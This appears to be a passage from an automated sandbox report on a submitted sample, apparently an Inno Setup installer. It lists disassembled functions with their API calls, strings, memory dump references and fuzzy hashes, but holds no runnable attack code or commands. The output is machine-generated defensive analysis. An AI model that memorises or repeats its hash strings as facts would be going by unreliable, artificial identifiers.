                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window$EnableEnabledVisible
                                                                                • String ID:
                                                                                • API String ID: 3234591441-0
                                                                                • Opcode ID: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                                                • Instruction ID: eab114e884733e02e348d5fb54c1eeaedaab2d2a8f53f62e6f3f1b5b82b3488b
                                                                                • Opcode Fuzzy Hash: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                                                • Instruction Fuzzy Hash: 90E0EDB9100300AAE711AB2BEC81A57769CBB94314F45843BAC099B293DA3EDC409B78
                                                                                Function 0046A26C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 229COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetActiveWindow.USER32(?), ref: 0046A378
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ActiveWindow
                                                                                • String ID: PrepareToInstall
                                                                                • API String ID: 2558294473-1101760603
                                                                                • Opcode ID: 2f09c314b6fb54b1472f2c84d4998d1c671ccdc982530a6e1a6c91392ff97de1
                                                                                • Instruction ID: 163d609461ff3b9580316b21a780dec1cd9204125e937a74b025edb926540d27
                                                                                • Opcode Fuzzy Hash: 2f09c314b6fb54b1472f2c84d4998d1c671ccdc982530a6e1a6c91392ff97de1
                                                                                • Instruction Fuzzy Hash: 90A10A34A00109DFCB00EB99D985EEEB7F5AF88304F1580B6E404AB362D738AE45DF59
                                                                                Function 0046C764 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 209COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: /:*?"<>|
                                                                                • API String ID: 0-4078764451
                                                                                • Opcode ID: daa5e4ec58dfd3a4f8b67407405db92af73f638a584e66193a323fc2660a566c
                                                                                • Instruction ID: b706238f5af82f8a54f925a22e06db4ee79b372672e861a4edd763b161806009
                                                                                • Opcode Fuzzy Hash: daa5e4ec58dfd3a4f8b67407405db92af73f638a584e66193a323fc2660a566c
                                                                                • Instruction Fuzzy Hash: 6F7197B0B44244AADB20E766DCC2BEE77A19F41704F108167F5807B392E7B99D45878E
                                                                                Function 00482050 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetActiveWindow.USER32(?), ref: 004820FE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ActiveWindow
                                                                                • String ID: InitializeWizard
                                                                                • API String ID: 2558294473-2356795471
                                                                                • Opcode ID: 4cb1695e49b1b07e3586b425a713be07569947560fbf0fba233168fdeef3d44e
                                                                                • Instruction ID: b8891c381381d1a0014b65a4ce29d1dfbbdf9d421e77ac889de6892087eb3363
                                                                                • Opcode Fuzzy Hash: 4cb1695e49b1b07e3586b425a713be07569947560fbf0fba233168fdeef3d44e
                                                                                • Instruction Fuzzy Hash: BE118234205204DFD711EBA5FE96B2977E4EB55314F20143BE5008B3A1DA796C50CB6D
                                                                                Function 0047C22C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C472,00000000,0047C5AC), ref: 0047C271
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C241
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                • API String ID: 47109696-1019749484
                                                                                • Opcode ID: 6e2d5090e95b4c6fabdd9168d7cad944b3593745ae6ad0b3bb6d2af319e0c910
                                                                                • Instruction ID: 70811ca8e083c9a3dbfae153db117623eb743e792d78c4ccda021ebaf15ccddc
                                                                                • Opcode Fuzzy Hash: 6e2d5090e95b4c6fabdd9168d7cad944b3593745ae6ad0b3bb6d2af319e0c910
                                                                                • Instruction Fuzzy Hash: 8EF08931B0411467DA00A5DA5C82B9E56DD8B55758F20407FF508EB253D9B99D02036C
                                                                                Function 0046F0EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,004763FA,?,0049C1D0,?,0046F403,?,00000000,0046F99E,?,_is1), ref: 0046F10F
                                                                                Strings
                                                                                • Inno Setup: Setup Version, xrefs: 0046F10D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: Inno Setup: Setup Version
                                                                                • API String ID: 3702945584-4166306022
                                                                                • Opcode ID: 734ac0f1c1098741eb0e60cbf617dbc9041c5452899e61f021b18629f5aca0fc
                                                                                • Instruction ID: 253732d940e31991125f8b939195b5ca02eb4333684dc2ddbbcc15e62aa31341
                                                                                • Opcode Fuzzy Hash: 734ac0f1c1098741eb0e60cbf617dbc9041c5452899e61f021b18629f5aca0fc
                                                                                • Instruction Fuzzy Hash: 3BE06D713012047FD710AA6B9C85F5BBADDDF993A5F10403AB908DB392D578DD4081A8
                                                                                Function 0046F15C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F7DA,?,?,00000000,0046F99E,?,_is1,?), ref: 0046F16F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: NoModify
                                                                                • API String ID: 3702945584-1699962838
                                                                                • Opcode ID: 14b653d2795b3180ab09acf432715bdcca8a399851f75d04a8bb0bb30e96b91c
                                                                                • Instruction ID: dfbc78ba79a393f528aadc4bccb3a1e1d52346a2df28baf9fde3d1272b39f611
                                                                                • Opcode Fuzzy Hash: 14b653d2795b3180ab09acf432715bdcca8a399851f75d04a8bb0bb30e96b91c
                                                                                • Instruction Fuzzy Hash: D8E04FB4604304BFEB04DB55DD4AF6B77ECDB48750F10415ABA04DB281E674EE00C668
                                                                                Function 0047DF80 Relevance: 3.2, APIs: 2, Instructions: 160windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetACP.KERNEL32(?,?,00000001,00000000,0047E25F,?,-0000001A,004800D8,-00000010,?,00000004,0000001B,00000000,00480425,?,0045DECC), ref: 0047DFF6
                                                                                  • Part of subcall function 0042E32C: 73E9A570.USER32(00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB), ref: 0042E33B
                                                                                  • Part of subcall function 0042E32C: EnumFontsA.GDI32(?,00000000,0042E318,00000000,00000000,0042E384,?,00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000), ref: 0042E366
                                                                                  • Part of subcall function 0042E32C: 73E9A480.USER32(00000000,?,0042E38B,00000000,00000000,0042E384,?,00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000), ref: 0042E37E
                                                                                • SendNotifyMessageA.USER32(000203BE,00000496,00002711,-00000001), ref: 0047E1C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: A480A570EnumFontsMessageNotifySend
                                                                                • String ID:
                                                                                • API String ID: 2685184028-0
                                                                                • Opcode ID: d5a98fd350b21412a22cf4123539bd0c298e95acb479fbe192b8033f652af546
                                                                                • Instruction ID: 0ea8e5e95b90053dcc80dc26f94e29a170662e2b3e10ca2db4d961c35622b213
                                                                                • Opcode Fuzzy Hash: d5a98fd350b21412a22cf4123539bd0c298e95acb479fbe192b8033f652af546
                                                                                • Instruction Fuzzy Hash: 2651A6746001508BD710FF27D9C16963799EB88308B90C6BBA8089F367C77CDD068B9D
                                                                                Function 0042DC10 Relevance: 3.1, APIs: 2, Instructions: 113registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD48), ref: 0042DC4C
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD48), ref: 0042DCBC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID:
                                                                                • API String ID: 3660427363-0
                                                                                • Opcode ID: dcaea444aa2693f3151e4f161b8541bd325653ac2cf38fab622dd52302d9ecee
                                                                                • Instruction ID: 0afc69acb925fd444515a6cbe8b6240f093bd173affdd4b5aabebdcedbe93bcc
                                                                                • Opcode Fuzzy Hash: dcaea444aa2693f3151e4f161b8541bd325653ac2cf38fab622dd52302d9ecee
                                                                                • Instruction Fuzzy Hash: E0414F71E00529ABDB11DF95D881BAFB7B8AB00714F90846AE800F7241D778AE00CBA9
                                                                                Function 0042DED0 Relevance: 3.1, APIs: 2, Instructions: 111registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFE6,?,?,00000008,00000000,00000000,0042E013), ref: 0042DF7C
                                                                                • RegCloseKey.ADVAPI32(?,0042DFED,?,00000000,00000000,00000000,00000000,00000000,0042DFE6,?,?,00000008,00000000,00000000,0042E013), ref: 0042DFE0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseEnum
                                                                                • String ID:
                                                                                • API String ID: 2818636725-0
                                                                                • Opcode ID: 18687f4e18b3232f9437fac6e5314fb2332009eed5616211d6a140e10b5cd508
                                                                                • Instruction ID: 2fe76ac110d60e281b9c8dcd8425dafac1d5c60e45ccd2ae84570cbaedcb928d
                                                                                • Opcode Fuzzy Hash: 18687f4e18b3232f9437fac6e5314fb2332009eed5616211d6a140e10b5cd508
                                                                                • Instruction Fuzzy Hash: 52319170F04258AEDB11DFA2DD82BAEB7B9EB48304F91407BE501E7281D6785A01CA2D
                                                                                Function 004527D4 Relevance: 3.1, APIs: 2, Instructions: 60processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,?,?,004580B4,00000000,0045809C,?,?,?,00000000,0045284E,?,?,?,00000001), ref: 00452828
                                                                                • GetLastError.KERNEL32(00000000,00000000,?,?,004580B4,00000000,0045809C,?,?,?,00000000,0045284E,?,?,?,00000001), ref: 00452830
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CreateErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 2919029540-0
                                                                                • Opcode ID: 256024ef10b7bad05e9cca563efcf05eafb457725b2bcd1ab333216967b323f1
                                                                                • Instruction ID: 3ad6dec6d32dc5e6ab031f6e5884ad9a987dc2d9ff381773f4694f698bcb58b9
                                                                                • Opcode Fuzzy Hash: 256024ef10b7bad05e9cca563efcf05eafb457725b2bcd1ab333216967b323f1
                                                                                • Instruction Fuzzy Hash: D3117972600208AF8B00DEADDD41DABB7ECEB4E310B10456BFD08E3201D678AE148BA4
                                                                                Function 0040AFD8 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
                                                                                • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindFree
                                                                                • String ID:
                                                                                • API String ID: 4097029671-0
                                                                                • Opcode ID: 020963cbed5d1efe29b5c6b0b84e3d8c20ff6c1b4cf1f3711bef16ed23147c41
                                                                                • Instruction ID: 22447e907da962d806d3eb032de74b702d5affa043e15eb070a4a3d902aeafed
                                                                                • Opcode Fuzzy Hash: 020963cbed5d1efe29b5c6b0b84e3d8c20ff6c1b4cf1f3711bef16ed23147c41
                                                                                • Instruction Fuzzy Hash: 0001DF71300604AFD710FF69DC92E1B77A9DB8A718711807AF500AB7D0DA79AC0096AD
                                                                                Function 0041EEB4 Relevance: 3.0, APIs: 2, Instructions: 49threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                • 73EA5940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: A5940CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2589350566-0
                                                                                • Opcode ID: 4f622a916fb84fb1e9f1f3e222a7611e51385d213cb7cd19795c9b5a33aefee2
                                                                                • Instruction ID: 3b2ca51acea6f31c20bceb620234c512699c69eae89bb1383ecfa3b3ac64bed2
                                                                                • Opcode Fuzzy Hash: 4f622a916fb84fb1e9f1f3e222a7611e51385d213cb7cd19795c9b5a33aefee2
                                                                                • Instruction Fuzzy Hash: FD013976A04604BFDB06CF6BDC1195ABBE9E789720B22887BEC04D36A0E6355810DE18
                                                                                Function 00452C6C Relevance: 3.0, APIs: 2, Instructions: 48fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CAE
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,00452CD4), ref: 00452CB6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastMove
                                                                                • String ID:
                                                                                • API String ID: 55378915-0
                                                                                • Opcode ID: 4a87794495b209091e638427933314290125c3fb15c22ae1653921e41cb98622
                                                                                • Instruction ID: 8cb4f6990e07c72a34a39c3d349ee9eec810a974928c7dd1f8c60ebce1e721cc
                                                                                • Opcode Fuzzy Hash: 4a87794495b209091e638427933314290125c3fb15c22ae1653921e41cb98622
                                                                                • Instruction Fuzzy Hash: D5014971B00204BB8B11DF799D414AEB7ECEB4A32531045BBFC08E3243EAB84E048558
                                                                                Function 0045275C Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527BB), ref: 00452795
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,004527BB), ref: 0045279D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1375471231-0
                                                                                • Opcode ID: 638905229d0ae290751701005a3127306b10a627987a4e9871fe20b3b513e6c4
                                                                                • Instruction ID: 7517b5081c7c6af98826394809c6fe2d976c468da5ddf52a6f68070703836f12
                                                                                • Opcode Fuzzy Hash: 638905229d0ae290751701005a3127306b10a627987a4e9871fe20b3b513e6c4
                                                                                • Instruction Fuzzy Hash: 40F0FC71A04704AFCF00DF759D4199EB7E8DB0E715B5049B7FC14E3242E7B94E1485A8
                                                                                Function 0042324C Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 00423259
                                                                                • LoadCursorA.USER32(00000000,00000000), ref: 00423283
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CursorLoad
                                                                                • String ID:
                                                                                • API String ID: 3238433803-0
                                                                                • Opcode ID: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                                • Instruction ID: c8375b04fab070422f53c3d6524130e38f027298e82d6ab835706982cf041ecc
                                                                                • Opcode Fuzzy Hash: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                                • Instruction Fuzzy Hash: 0FF0A711704114AADA105D7E6CC0E2B7268DB91B36B6103BBFA3AD72D1C62E1D41457D
                                                                                Function 0042E3A4 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                • LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
